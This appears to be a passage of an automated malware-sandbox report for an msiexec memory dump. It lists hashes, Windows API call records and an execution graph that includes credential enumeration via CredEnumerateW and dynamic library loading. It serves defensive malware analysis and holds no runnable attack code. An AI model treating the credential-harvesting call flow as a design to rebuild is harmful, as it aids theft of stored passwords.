                      • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                      • Instruction ID: c78332a1599cbf0a214a232ab260d5c21dc82b7db7b3ad3bd7f49898c11b6e66
                      • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                      • Instruction Fuzzy Hash: 1C01F500945341F8FB2166743C05EBA5FEC9B676A0B181BD6E24DDB193D9A0C506C3FA
                      APIs
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,23591D66,00000000,00000000,?,23595C88,23591D66,00000000,00000000,00000000,?,23595E85,00000006,FlsSetValue), ref: 23595D13
                      • GetLastError.KERNEL32(?,23595C88,23591D66,00000000,00000000,00000000,?,23595E85,00000006,FlsSetValue,2359E190,FlsSetValue,00000000,00000364,?,23595BC8), ref: 23595D1F
                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,23595C88,23591D66,00000000,00000000,00000000,?,23595E85,00000006,FlsSetValue,2359E190,FlsSetValue,00000000), ref: 23595D2D
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: LibraryLoad$ErrorLast
                      • String ID:
                      • API String ID: 3177248105-0
                      • Opcode ID: c90d182a9fb8c52ae63fb1d5925f417341313bb35f7aedbd94f2167ec09f8910
                      • Instruction ID: 5dc92be8f08f356b8a1b5250fd7ab544ac3b4f35d7f6659da196a60c2170c389
                      • Opcode Fuzzy Hash: c90d182a9fb8c52ae63fb1d5925f417341313bb35f7aedbd94f2167ec09f8910
                      • Instruction Fuzzy Hash: 0D01D436602322ABD3116A68AC4DE467798EF057A17170E61FA0DD7140E734EA22CAE0
                      APIs
                      • _free.LIBCMT ref: 2359655C
                        • Part of subcall function 235962BC: IsProcessorFeaturePresent.KERNEL32(00000017,235962AB,00000000,?,?,?,?,00000016,?,?,235962B8,00000000,00000000,00000000,00000000,00000000), ref: 235962BE
                        • Part of subcall function 235962BC: GetCurrentProcess.KERNEL32(C0000417), ref: 235962E0
                        • Part of subcall function 235962BC: TerminateProcess.KERNEL32(00000000), ref: 235962E7
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                      • String ID: *?$.
                      • API String ID: 2667617558-3972193922
                      • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                      • Instruction ID: 9d7a8c17c6c7055ff599e28e930e23e68ba4638afd7100c17855e9064c19f960
                      • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                      • Instruction Fuzzy Hash: 6D51B675E00209DFEF14DFA8D9809ADB7F9EF98324F1441A9D458E7301D635DA058B90
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID: : $Se.
                      • API String ID: 4218353326-4089948878
                      • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                      • Instruction ID: b4b00ce9932444a0f158754536e413893fe8765602d622520d249bfc6e6fc630
                      • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                      • Instruction Fuzzy Hash: 1911E7B1A00389AEDB11DFA8E840BDDFBFCEF59204F144096E549E7212E6709B02C7A5
                      APIs
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 23592903
                        • Part of subcall function 235935D2: RaiseException.KERNEL32(?,?,?,23592925,00000000,00000000,00000000,?,?,?,?,?,23592925,?,235A21B8), ref: 23593632
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 23592920
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID: Exception@8Throw$ExceptionRaise
                      • String ID: Unknown exception
                      • API String ID: 3476068407-410509341
                      • Opcode ID: 7b7eeb4feacc4ff30f9d0afe0c419f273286635315ce0eaad6a40a045462ab66
                      • Instruction ID: b3e099275ca73733978a2d912001615f64bb5e196bea24edde6f1f05afacad7b
                      • Opcode Fuzzy Hash: 7b7eeb4feacc4ff30f9d0afe0c419f273286635315ce0eaad6a40a045462ab66
                      • Instruction Fuzzy Hash: 44F0AF34A1430CB7EF14B6A8FC4499D77BCDB50650B5085E1EA2CD6091FB31EA56C5C0
                      APIs
                      • GetOEMCP.KERNEL32(00000000,?,?,23596C7C,?), ref: 23596A1E
                      • GetACP.KERNEL32(00000000,?,?,23596C7C,?), ref: 23596A35
                      Strings
                      Memory Dump Source
                      • Source File: 00000009.00000002.3418617687.0000000023591000.00000040.00001000.00020000.00000000.sdmp, Offset: 23590000, based on PE: true
                      • Associated: 00000009.00000002.3418594137.0000000023590000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000009.00000002.3418617687.00000000235A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_9_2_23590000_msiexec.jbxd
                      Similarity
                      • API ID:
                      • String ID: |lY#
                      • API String ID: 0-2289984787
                      • Opcode ID: 1dd597d40d381ea28ad95fbfd0da8fc57910fd7f91cbb5126ba54ffa41539513
                      • Instruction ID: ea76d48d485dec26d5dfad741a28547eb5223a5899ab5a7230aaf981a9a109f2
                      • Opcode Fuzzy Hash: 1dd597d40d381ea28ad95fbfd0da8fc57910fd7f91cbb5126ba54ffa41539513
                      • Instruction Fuzzy Hash: DCF03C30510249CBE710EB64D448B6C7BB5FB50339F144785E82C8A1D1EB79994A9B81

                      Execution Graph

                      Execution Coverage:5.6%
                      Dynamic/Decrypted Code Coverage:0%
                      Signature Coverage:1.3%
                      Total number of Nodes:2000
                      Total number of Limit Nodes:76
                      execution_graph 40277 441819 40280 430737 40277->40280 40279 441825 40281 430756 40280->40281 40282 43076d 40280->40282 40283 430774 40281->40283 40284 43075f 40281->40284 40282->40279 40295 43034a memcpy 40283->40295 40294 4169a7 11 API calls 40284->40294 40287 4307ce 40288 430819 memset 40287->40288 40296 415b2c 11 API calls 40287->40296 40288->40282 40289 43077e 40289->40282 40289->40287 40292 4307fa 40289->40292 40291 4307e9 40291->40282 40291->40288 40297 4169a7 11 API calls 40292->40297 40294->40282 40295->40289 40296->40291 40297->40282 37678 442ec6 19 API calls 37852 4152c6 malloc 37853 4152e2 37852->37853 37854 4152ef 37852->37854 37856 416760 11 API calls 37854->37856 37856->37853 37857 4466f4 37876 446904 37857->37876 37859 446700 GetModuleHandleA 37862 446710 __set_app_type __p__fmode __p__commode 37859->37862 37861 4467a4 37863 4467ac __setusermatherr 37861->37863 37864 4467b8 37861->37864 37862->37861 37863->37864 37877 4468f0 _controlfp 37864->37877 37866 4467bd _initterm __wgetmainargs _initterm 37867 44681e GetStartupInfoW 37866->37867 37868 446810 37866->37868 37870 446866 GetModuleHandleA 37867->37870 37878 41276d 37870->37878 37874 446896 exit 37875 44689d _cexit 37874->37875 37875->37868 37876->37859 37877->37866 37879 41277d 37878->37879 37921 4044a4 LoadLibraryW 37879->37921 37881 412785 37913 412789 37881->37913 37929 414b81 37881->37929 37884 4127c8 37935 412465 memset ??2@YAPAXI 37884->37935 37886 4127ea 37947 40ac21 37886->37947 37891 412813 37966 40dd07 memset 37891->37966 37892 412827 37971 40db69 memset 37892->37971 37896 412822 37993 4125b6 ??3@YAXPAX DeleteObject 37896->37993 37897 40ada2 _wcsicmp 37898 41283d 37897->37898 37898->37896 37901 412863 CoInitialize 37898->37901 37976 41268e 37898->37976 37900 412966 37994 40b1ab free free 37900->37994 37992 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37901->37992 37905 41296f 37995 40b633 37905->37995 37907 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37912 412957 CoUninitialize 37907->37912 37918 4128ca 37907->37918 37912->37896 37913->37874 37913->37875 37914 4128d0 TranslateAcceleratorW 37915 412941 GetMessageW 37914->37915 37914->37918 37915->37912 37915->37914 37916 412909 IsDialogMessageW 37916->37915 37916->37918 37917 4128fd IsDialogMessageW 37917->37915 37917->37916 37918->37914 37918->37916 37918->37917 37919 41292b TranslateMessage DispatchMessageW 37918->37919 37920 41291f IsDialogMessageW 37918->37920 37919->37915 37920->37915 37920->37919 37922 4044cf GetProcAddress 37921->37922 37925 4044f7 37921->37925 37923 4044e8 FreeLibrary 37922->37923 37926 4044df 37922->37926 37924 4044f3 37923->37924 37923->37925 37924->37925 37927 404507 MessageBoxW 37925->37927 37928 40451e 37925->37928 37926->37923 37927->37881 37928->37881 37930 414b8a 37929->37930 37931 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37929->37931 37999 40a804 memset 37930->37999 37931->37884 37934 414b9e GetProcAddress 37934->37931 37937 4124e0 37935->37937 37936 412505 ??2@YAPAXI 37938 41251c 37936->37938 37941 412521 37936->37941 37937->37936 38021 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37938->38021 38010 444722 37941->38010 37946 41259b wcscpy 37946->37886 38026 40b1ab free free 37947->38026 37949 40ad76 38027 40aa04 37949->38027 37952 40a9ce malloc memcpy free free 37954 40ac5c 37952->37954 37953 40ad4b 37953->37949 38032 40a9ce 37953->38032 37954->37949 37954->37952 37954->37953 37956 40acf0 37954->37956 37957 40ace7 free 37954->37957 38030 40a8d0 7 API calls 37954->38030 37956->37954 38031 4099f4 malloc memcpy free 37956->38031 37957->37954 37962 40ada2 37963 40adc9 37962->37963 37965 40adaa 37962->37965 37963->37891 37963->37892 37964 40adb3 _wcsicmp 37964->37963 37964->37965 37965->37963 37965->37964 38040 40dce0 37966->38040 37968 40dd3a GetModuleHandleW 38045 40dba7 37968->38045 37972 40dce0 3 API calls 37971->37972 37973 40db99 37972->37973 38117 40dae1 37973->38117 38131 402f3a 37976->38131 37978 412766 37978->37896 37978->37901 37979 4126d3 _wcsicmp 37980 4126a8 37979->37980 37980->37978 37980->37979 37982 41270a 37980->37982 38165 4125f8 7 API calls 37980->38165 37982->37978 38134 411ac5 37982->38134 37992->37907 37993->37900 37994->37905 37996 40b640 37995->37996 37997 40b639 free 37995->37997 37998 40b1ab free free 37996->37998 37997->37996 37998->37913 38000 40a83b GetSystemDirectoryW 37999->38000 38001 40a84c wcscpy 37999->38001 38000->38001 38006 409719 wcslen 38001->38006 38004 40a881 LoadLibraryW 38005 40a886 38004->38005 38005->37931 38005->37934 38007 409724 38006->38007 38008 409739 wcscat LoadLibraryW 38006->38008 38007->38008 38009 40972c wcscat 38007->38009 38008->38004 38008->38005 38009->38008 38011 444732 38010->38011 38012 444728 DeleteObject 38010->38012 38022 409cc3 38011->38022 38012->38011 38014 412551 38015 4010f9 38014->38015 38016 401130 38015->38016 38017 401134 GetModuleHandleW LoadIconW 38016->38017 38018 401107 wcsncat 38016->38018 38019 40a7be 38017->38019 38018->38016 38020 40a7d2 38019->38020 38020->37946 38020->38020 38021->37941 38025 409bfd memset wcscpy 38022->38025 38024 409cdb CreateFontIndirectW 38024->38014 38025->38024 38026->37954 38028 40aa14 38027->38028 38029 40aa0a free 38027->38029 38028->37962 38029->38028 38030->37954 38031->37956 38033 40a9e7 38032->38033 38034 40a9dc free 38032->38034 38039 4099f4 malloc memcpy free 38033->38039 38035 40a9f3 38034->38035 38038 40a8d0 7 API calls 38035->38038 38037 40a9f2 38037->38035 38038->37949 38039->38037 38064 409bca GetModuleFileNameW 38040->38064 38042 40dce6 wcsrchr 38043 40dcf5 38042->38043 38044 40dcf9 wcscat 38042->38044 38043->38044 38044->37968 38065 44db70 38045->38065 38049 40dbfd 38068 4447d9 38049->38068 38052 40dc34 wcscpy wcscpy 38094 40d6f5 38052->38094 38053 40dc1f wcscpy 38053->38052 38056 40d6f5 3 API calls 38057 40dc73 38056->38057 38058 40d6f5 3 API calls 38057->38058 38059 40dc89 38058->38059 38060 40d6f5 3 API calls 38059->38060 38061 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38060->38061 38100 40da80 38061->38100 38064->38042 38066 40dbb4 memset memset 38065->38066 38067 409bca GetModuleFileNameW 38066->38067 38067->38049 38070 4447f4 38068->38070 38069 40dc1b 38069->38052 38069->38053 38070->38069 38071 444807 ??2@YAPAXI 38070->38071 38072 44481f 38071->38072 38073 444873 _snwprintf 38072->38073 38074 4448ab wcscpy 38072->38074 38107 44474a 8 API calls 38073->38107 38076 4448bb 38074->38076 38108 44474a 8 API calls 38076->38108 38077 4448a7 38077->38074 38077->38076 38079 4448cd 38109 44474a 8 API calls 38079->38109 38081 4448e2 38110 44474a 8 API calls 38081->38110 38083 4448f7 38111 44474a 8 API calls 38083->38111 38085 44490c 38112 44474a 8 API calls 38085->38112 38087 444921 38113 44474a 8 API calls 38087->38113 38089 444936 38114 44474a 8 API calls 38089->38114 38091 44494b 38115 44474a 8 API calls 38091->38115 38093 444960 ??3@YAXPAX 38093->38069 38095 44db70 38094->38095 38096 40d702 memset GetPrivateProfileStringW 38095->38096 38097 40d752 38096->38097 38098 40d75c WritePrivateProfileStringW 38096->38098 38097->38098 38099 40d758 38097->38099 38098->38099 38099->38056 38101 44db70 38100->38101 38102 40da8d memset 38101->38102 38103 40daac LoadStringW 38102->38103 38104 40dac6 38103->38104 38104->38103 38106 40dade 38104->38106 38116 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38104->38116 38106->37896 38107->38077 38108->38079 38109->38081 38110->38083 38111->38085 38112->38087 38113->38089 38114->38091 38115->38093 38116->38104 38127 409b98 GetFileAttributesW 38117->38127 38119 40daea 38120 40db63 38119->38120 38121 40daef wcscpy wcscpy GetPrivateProfileIntW 38119->38121 38120->37897 38128 40d65d GetPrivateProfileStringW 38121->38128 38123 40db3e 38129 40d65d GetPrivateProfileStringW 38123->38129 38125 40db4f 38130 40d65d GetPrivateProfileStringW 38125->38130 38127->38119 38128->38123 38129->38125 38130->38120 38166 40eaff 38131->38166 38135 411ae2 memset 38134->38135 38136 411b8f 38134->38136 38207 409bca GetModuleFileNameW 38135->38207 38148 411a8b 38136->38148 38138 411b0a wcsrchr 38139 411b22 wcscat 38138->38139 38140 411b1f 38138->38140 38208 414770 wcscpy wcscpy wcscpy CloseHandle 38139->38208 38140->38139 38142 411b67 38209 402afb 38142->38209 38146 411b7f 38265 40ea13 SendMessageW memset SendMessageW 38146->38265 38149 402afb 27 API calls 38148->38149 38150 411ac0 38149->38150 38151 4110dc 38150->38151 38152 41113e 38151->38152 38157 4110f0 38151->38157 38290 40969c LoadCursorW SetCursor 38152->38290 38154 411143 38291 444a54 38154->38291 38294 4032b4 38154->38294 38155 4110f7 _wcsicmp 38155->38157 38156 411157 38158 40ada2 _wcsicmp 38156->38158 38157->38152 38157->38155 38312 410c46 10 API calls 38157->38312 38161 411167 38158->38161 38159 4111af 38161->38159 38162 4111a6 qsort 38161->38162 38162->38159 38165->37980 38167 40eb10 38166->38167 38180 40e8e0 38167->38180 38170 40eb6c memcpy memcpy 38171 40ebe1 38170->38171 38172 40ebb7 38170->38172 38171->38170 38173 40ebf2 ??2@YAPAXI ??2@YAPAXI 38171->38173 38172->38171 38174 40d134 16 API calls 38172->38174 38175 40ec2e ??2@YAPAXI 38173->38175 38178 40ec65 38173->38178 38174->38172 38175->38178 38190 40ea7f 38178->38190 38179 402f49 38179->37980 38181 40e8f2 38180->38181 38182 40e8eb ??3@YAXPAX 38180->38182 38183 40e900 38181->38183 38184 40e8f9 ??3@YAXPAX 38181->38184 38182->38181 38185 40e90a ??3@YAXPAX 38183->38185 38187 40e911 38183->38187 38184->38183 38185->38187 38186 40e931 ??2@YAPAXI ??2@YAPAXI 38186->38170 38187->38186 38188 40e921 ??3@YAXPAX 38187->38188 38189 40e92a ??3@YAXPAX 38187->38189 38188->38189 38189->38186 38191 40aa04 free 38190->38191 38192 40ea88 38191->38192 38193 40aa04 free 38192->38193 38194 40ea90 38193->38194 38195 40aa04 free 38194->38195 38196 40ea98 38195->38196 38197 40aa04 free 38196->38197 38198 40eaa0 38197->38198 38199 40a9ce 4 API calls 38198->38199 38200 40eab3 38199->38200 38201 40a9ce 4 API calls 38200->38201 38202 40eabd 38201->38202 38203 40a9ce 4 API calls 38202->38203 38204 40eac7 38203->38204 38205 40a9ce 4 API calls 38204->38205 38206 40ead1 38205->38206 38206->38179 38207->38138 38208->38142 38266 40b2cc 38209->38266 38211 402b0a 38212 40b2cc 27 API calls 38211->38212 38213 402b23 38212->38213 38214 40b2cc 27 API calls 38213->38214 38215 402b3a 38214->38215 38216 40b2cc 27 API calls 38215->38216 38217 402b54 38216->38217 38218 40b2cc 27 API calls 38217->38218 38219 402b6b 38218->38219 38220 40b2cc 27 API calls 38219->38220 38221 402b82 38220->38221 38222 40b2cc 27 API calls 38221->38222 38223 402b99 38222->38223 38224 40b2cc 27 API calls 38223->38224 38225 402bb0 38224->38225 38226 40b2cc 27 API calls 38225->38226 38227 402bc7 38226->38227 38228 40b2cc 27 API calls 38227->38228 38229 402bde 38228->38229 38230 40b2cc 27 API calls 38229->38230 38231 402bf5 38230->38231 38232 40b2cc 27 API calls 38231->38232 38233 402c0c 38232->38233 38234 40b2cc 27 API calls 38233->38234 38235 402c23 38234->38235 38236 40b2cc 27 API calls 38235->38236 38237 402c3a 38236->38237 38238 40b2cc 27 API calls 38237->38238 38239 402c51 38238->38239 38240 40b2cc 27 API calls 38239->38240 38241 402c68 38240->38241 38242 40b2cc 27 API calls 38241->38242 38243 402c7f 38242->38243 38244 40b2cc 27 API calls 38243->38244 38245 402c99 38244->38245 38246 40b2cc 27 API calls 38245->38246 38247 402cb3 38246->38247 38248 40b2cc 27 API calls 38247->38248 38249 402cd5 38248->38249 38250 40b2cc 27 API calls 38249->38250 38251 402cf0 38250->38251 38252 40b2cc 27 API calls 38251->38252 38253 402d0b 38252->38253 38254 40b2cc 27 API calls 38253->38254 38255 402d26 38254->38255 38256 40b2cc 27 API calls 38255->38256 38257 402d3e 38256->38257 38258 40b2cc 27 API calls 38257->38258 38259 402d59 38258->38259 38260 40b2cc 27 API calls 38259->38260 38261 402d78 38260->38261 38262 40b2cc 27 API calls 38261->38262 38263 402d93 38262->38263 38264 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38263->38264 38264->38146 38265->38136 38269 40b58d 38266->38269 38268 40b2d1 38268->38211 38270 40b5a4 GetModuleHandleW FindResourceW 38269->38270 38271 40b62e 38269->38271 38272 40b5c2 LoadResource 38270->38272 38274 40b5e7 38270->38274 38271->38268 38273 40b5d0 SizeofResource LockResource 38272->38273 38272->38274 38273->38274 38274->38271 38282 40afcf 38274->38282 38276 40b608 memcpy 38285 40b4d3 memcpy 38276->38285 38278 40b61e 38286 40b3c1 18 API calls 38278->38286 38280 40b626 38287 40b04b 38280->38287 38283 40b04b ??3@YAXPAX 38282->38283 38284 40afd7 ??2@YAPAXI 38283->38284 38284->38276 38285->38278 38286->38280 38288 40b051 ??3@YAXPAX 38287->38288 38289 40b05f 38287->38289 38288->38289 38289->38271 38290->38154 38292 444a64 FreeLibrary 38291->38292 38293 444a83 38291->38293 38292->38293 38293->38156 38295 4032c4 38294->38295 38296 40b633 free 38295->38296 38297 403316 38296->38297 38313 44553b 38297->38313 38301 403480 38511 40368c 15 API calls 38301->38511 38303 403489 38304 40b633 free 38303->38304 38305 403495 38304->38305 38305->38156 38306 4033a9 memset memcpy 38307 4033ec wcscmp 38306->38307 38308 40333c 38306->38308 38307->38308 38308->38301 38308->38306 38308->38307 38509 4028e7 11 API calls 38308->38509 38510 40f508 6 API calls 38308->38510 38311 403421 _wcsicmp 38311->38308 38312->38157 38314 445548 38313->38314 38315 445599 38314->38315 38512 40c768 38314->38512 38316 4455a8 memset 38315->38316 38324 4457f2 38315->38324 38595 403988 38316->38595 38322 4455e5 38337 445672 38322->38337 38342 44560f 38322->38342 38327 445854 38324->38327 38698 403e2d memset memset memset memset memset 38324->38698 38325 4458bb memset memset 38329 414c2e 14 API calls 38325->38329 38371 4458aa 38327->38371 38721 403c9c memset memset memset memset memset 38327->38721 38328 44595e memset memset 38332 414c2e 14 API calls 38328->38332 38333 4458f9 38329->38333 38331 445a00 memset memset 38744 414c2e 38331->38744 38340 44599c 38332->38340 38341 40b2cc 27 API calls 38333->38341 38334 44558c 38579 444b06 38334->38579 38335 44557a 38335->38334 38791 4136c0 CoTaskMemFree 38335->38791 38606 403fbe memset memset memset memset memset 38337->38606 38350 40b2cc 27 API calls 38340->38350 38351 445909 38341->38351 38353 4087b3 337 API calls 38342->38353 38344 445bca 38352 445c8b memset memset 38344->38352 38408 445cf0 38344->38408 38345 445b38 memset memset memset 38356 445bd4 38345->38356 38357 445b98 38345->38357 38346 445849 38807 40b1ab free free 38346->38807 38365 4459ac 38350->38365 38362 409d1f 6 API calls 38351->38362 38366 414c2e 14 API calls 38352->38366 38363 445621 38353->38363 38354 445585 38792 41366b FreeLibrary 38354->38792 38355 44589f 38808 40b1ab free free 38355->38808 38360 414c2e 14 API calls 38356->38360 38357->38356 38368 445ba2 38357->38368 38358 40b2cc 27 API calls 38370 445a4f 38358->38370 38373 445be2 38360->38373 38361 403335 38508 4452e5 45 API calls 38361->38508 38376 445919 38362->38376 38793 4454bf 20 API calls 38363->38793 38364 445823 38364->38346 38386 4087b3 337 API calls 38364->38386 38377 409d1f 6 API calls 38365->38377 38378 445cc9 38366->38378 38878 4099c6 wcslen 38368->38878 38369 4456b2 38795 40b1ab free free 38369->38795 38757 409d1f wcslen wcslen 38370->38757 38371->38325 38405 44594a 38371->38405 38384 40b2cc 27 API calls 38373->38384 38374 445d3d 38404 40b2cc 27 API calls 38374->38404 38375 445d88 memset memset memset 38387 414c2e 14 API calls 38375->38387 38809 409b98 GetFileAttributesW 38376->38809 38388 4459bc 38377->38388 38389 409d1f 6 API calls 38378->38389 38379 445879 38379->38355 38390 4087b3 337 API calls 38379->38390 38381 445bb3 38881 445403 memset 38381->38881 38382 445680 38382->38369 38629 4087b3 memset 38382->38629 38393 445bf3 38384->38393 38386->38364 38396 445dde 38387->38396 38874 409b98 GetFileAttributesW 38388->38874 38398 445ce1 38389->38398 38390->38379 38403 409d1f 6 API calls 38393->38403 38394 445928 38394->38405 38810 40b6ef 38394->38810 38406 40b2cc 27 API calls 38396->38406 38898 409b98 GetFileAttributesW 38398->38898 38402 40b2cc 27 API calls 38410 445a94 38402->38410 38412 445c07 38403->38412 38413 445d54 _wcsicmp 38404->38413 38405->38328 38417 4459ed 38405->38417 38416 445def 38406->38416 38407 4459cb 38407->38417 38424 40b6ef 249 API calls 38407->38424 38408->38361 38408->38374 38408->38375 38409 445389 255 API calls 38409->38344 38762 40ae18 38410->38762 38411 44566d 38411->38324 38680 413d4c 38411->38680 38420 445389 255 API calls 38412->38420 38421 445d71 38413->38421 38485 445d67 38413->38485 38415 445665 38794 40b1ab free free 38415->38794 38422 409d1f 6 API calls 38416->38422 38417->38331 38458 445b22 38417->38458 38426 445c17 38420->38426 38899 445093 23 API calls 38421->38899 38429 445e03 38422->38429 38424->38417 38425 4456d8 38431 40b2cc 27 API calls 38425->38431 38432 40b2cc 27 API calls 38426->38432 38428 44563c 38428->38415 38434 4087b3 337 API calls 38428->38434 38900 409b98 GetFileAttributesW 38429->38900 38430 40b6ef 249 API calls 38430->38361 38436 4456e2 38431->38436 38437 445c23 38432->38437 38433 445d83 38433->38361 38434->38428 38796 413fa6 _wcsicmp _wcsicmp 38436->38796 38441 409d1f 6 API calls 38437->38441 38439 445e12 38446 445e6b 38439->38446 38453 40b2cc 27 API calls 38439->38453 38444 445c37 38441->38444 38442 445aa1 38445 445b17 38442->38445 38462 445ab2 memset 38442->38462 38476 409d1f 6 API calls 38442->38476 38769 40add4 38442->38769 38774 445389 38442->38774 38783 40ae51 38442->38783 38443 4456eb 38449 4456fd memset memset memset memset 38443->38449 38450 4457ea 38443->38450 38451 445389 255 API calls 38444->38451 38875 40aebe 38445->38875 38902 445093 23 API calls 38446->38902 38797 409c70 wcscpy wcsrchr 38449->38797 38800 413d29 38450->38800 38457 445c47 38451->38457 38459 445e33 38453->38459 38455 445e7e 38461 445f67 38455->38461 38464 40b2cc 27 API calls 38457->38464 38458->38344 38458->38345 38460 409d1f 6 API calls 38459->38460 38465 445e47 38460->38465 38466 40b2cc 27 API calls 38461->38466 38467 40b2cc 27 API calls 38462->38467 38469 445c53 38464->38469 38901 409b98 GetFileAttributesW 38465->38901 38471 445f73 38466->38471 38467->38442 38468 409c70 2 API calls 38472 44577e 38468->38472 38473 409d1f 6 API calls 38469->38473 38475 409d1f 6 API calls 38471->38475 38477 409c70 2 API calls 38472->38477 38478 445c67 38473->38478 38474 445e56 38474->38446 38482 445e83 memset 38474->38482 38479 445f87 38475->38479 38476->38442 38480 44578d 38477->38480 38481 445389 255 API calls 38478->38481 38905 409b98 GetFileAttributesW 38479->38905 38480->38450 38487 40b2cc 27 API calls 38480->38487 38481->38344 38486 40b2cc 27 API calls 38482->38486 38485->38361 38485->38430 38488 445eab 38486->38488 38489 4457a8 38487->38489 38490 409d1f 6 API calls 38488->38490 38491 409d1f 6 API calls 38489->38491 38492 445ebf 38490->38492 38493 4457b8 38491->38493 38494 40ae18 9 API calls 38492->38494 38799 409b98 GetFileAttributesW 38493->38799 38504 445ef5 38494->38504 38496 4457c7 38496->38450 38497 4087b3 337 API calls 38496->38497 38497->38450 38498 40ae51 9 API calls 38498->38504 38499 445f5c 38500 40aebe FindClose 38499->38500 38500->38461 38501 40add4 2 API calls 38501->38504 38502 40b2cc 27 API calls 38502->38504 38503 409d1f 6 API calls 38503->38504 38504->38498 38504->38499 38504->38501 38504->38502 38504->38503 38506 445f3a 38504->38506 38903 409b98 GetFileAttributesW 38504->38903 38904 445093 23 API calls 38506->38904 38508->38308 38509->38311 38510->38308 38511->38303 38513 40c775 38512->38513 38906 40b1ab free free 38513->38906 38515 40c788 38907 40b1ab free free 38515->38907 38517 40c790 38908 40b1ab free free 38517->38908 38519 40c798 38520 40aa04 free 38519->38520 38521 40c7a0 38520->38521 38909 40c274 memset 38521->38909 38526 40a8ab 9 API calls 38527 40c7c3 38526->38527 38528 40a8ab 9 API calls 38527->38528 38529 40c7d0 38528->38529 38938 40c3c3 38529->38938 38533 40c7e5 38534 40c877 38533->38534 38535 40c86c 38533->38535 38961 40a706 wcslen memcpy 38533->38961 38963 40c634 49 API calls 38533->38963 38542 40bdb0 38534->38542 38964 4053fe 39 API calls 38535->38964 38538 40c813 _wcslwr 38962 40c634 49 API calls 38538->38962 38540 40c829 wcslen 38540->38533 39149 404363 38542->39149 38545 40bf5d 39169 40440c 38545->39169 38547 40bdee 38547->38545 38550 40b2cc 27 API calls 38547->38550 38548 40bddf CredEnumerateW 38548->38547 38551 40be02 wcslen 38550->38551 38551->38545 38558 40be1e 38551->38558 38552 40be26 wcsncmp 38552->38558 38555 40be7d memset 38556 40bea7 memcpy 38555->38556 38555->38558 38557 40bf11 wcschr 38556->38557 38556->38558 38557->38558 38558->38545 38558->38552 38558->38555 38558->38556 38558->38557 38559 40b2cc 27 API calls 38558->38559 38561 40bf43 LocalFree 38558->38561 39172 40bd5d 28 API calls 38558->39172 39173 404423 38558->39173 38560 40bef6 _wcsnicmp 38559->38560 38560->38557 38560->38558 38561->38558 38562 4135f7 39186 4135e0 38562->39186 38565 40b2cc 27 API calls 38566 41360d 38565->38566 38567 40a804 8 API calls 38566->38567 38568 413613 38567->38568 38569 41361b 38568->38569 38570 41363e 38568->38570 38572 40b273 27 API calls 38569->38572 38571 4135e0 FreeLibrary 38570->38571 38573 413643 38571->38573 38574 413625 GetProcAddress 38572->38574 38573->38335 38574->38570 38575 413648 38574->38575 38576 413658 38575->38576 38577 4135e0 FreeLibrary 38575->38577 38576->38335 38578 413666 38577->38578 38578->38335 39189 4449b9 38579->39189 38582 444c1f 38582->38315 38583 4449b9 42 API calls 38585 444b4b 38583->38585 38584 444c15 38586 4449b9 42 API calls 38584->38586 38585->38584 39210 444972 GetVersionExW 38585->39210 38586->38582 